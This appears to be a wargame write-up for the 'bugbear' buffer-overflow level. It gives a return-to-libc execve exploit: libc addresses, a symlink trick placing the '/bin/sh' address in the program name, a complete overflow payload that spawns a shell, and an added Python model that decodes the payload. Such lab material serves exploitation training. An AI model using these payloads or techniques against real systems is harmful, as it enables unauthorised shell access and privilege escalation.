bugbear - RTL2
stack : *ret[4] + *execve_addr[4] + *execve_offset[4] + *lib_addr[4] + *fp[4] + buffer[40] + sfp[4] + ret[4]
execve : 0x400a9d48
exit : 0x400391e0
execve(filename, *argv[], 0) -> execve("/bin/sh", &"/bin/sh", \x00, &NULL)
Symbolic Link : ln -s giant `python -c 'print "\xf9\xbf\x0f\x40"'` (address of "/bin/sh")
"/bin/sh" : 0x400fbff9
&"/bin/sh", \x00 : 0xbffffff7
&NULL : 0xbffffffc
Payload : ./`python -c 'print "\xf9\xbf\x0f\x40"'` "`python -c 'print "A"*44 + "\x48\x9d\x0a\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "\xf7\xff\xff\xbf" + "\xfc\xff\xff\xbf"'`"
Using RTL_execve
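Added here as an illustration, not part of the original notes: a small Python model of why the two stack addresses above line up with what execve expects, plus a decoder for the 64-byte argument. It assumes the classic layout the addresses imply (stack top at 0xc0000000, four NUL bytes at 0xbffffffc, program name immediately below them); the slot names in the decoder are mine.

```python
import struct

STACK_TOP = 0xC0000000            # assumed: classic 32-bit Linux stack top
BINSH_ADDR = 0x400FBFF9           # "/bin/sh" in libc (from the notes)
EXECVE_ADDR = 0x400A9D48          # execve (from the notes)
EXIT_ADDR = 0x400391E0            # exit (from the notes)
ARGV_ADDR = 0xBFFFFFF7            # &"/bin/sh", \x00 (from the notes)
ENVP_ADDR = 0xBFFFFFFC            # &NULL (from the notes)

def stack_top_image(prog_name: bytes) -> tuple[int, bytes]:
    """Model the last bytes of the stack: the NUL-terminated program
    name followed by the four NUL bytes at 0xbffffffc (assumption).
    Returns (base address of the image, image bytes)."""
    image = prog_name + b"\x00" + b"\x00" * 4
    return STACK_TOP - len(image), image

def read_ptr(base: int, image: bytes, addr: int) -> int:
    """Read a little-endian 32-bit value at addr out of the image."""
    off = addr - base
    return struct.unpack("<I", image[off:off + 4])[0]

def resolve_execve_args(prog_name: bytes) -> dict:
    """What execve() sees for argv[0], argv[1] and envp[0] when argv
    and envp are the two stack addresses from the notes. With the
    program name being "./" + the 4 address bytes, argv[0] becomes
    the libc "/bin/sh" pointer and argv[1]/envp[0] read as NULL."""
    base, image = stack_top_image(prog_name)
    return {
        "argv0": read_ptr(base, image, ARGV_ADDR),
        "argv1": read_ptr(base, image, ARGV_ADDR + 4),
        "envp0": read_ptr(base, image, ENVP_ADDR),
    }

def decode_payload(payload: bytes) -> dict:
    """Split the 64-byte argument into named 4-byte slots:
    buffer[40] + sfp[4] are padding, then ret (execve), the fake
    return (exit) and the three execve arguments."""
    if len(payload) != 64:
        raise ValueError("expected 44 bytes of padding plus five slots")
    names = ["ret", "fake_ret", "filename", "argv", "envp"]
    return dict(zip(names, struct.unpack("<5I", payload[44:])))
```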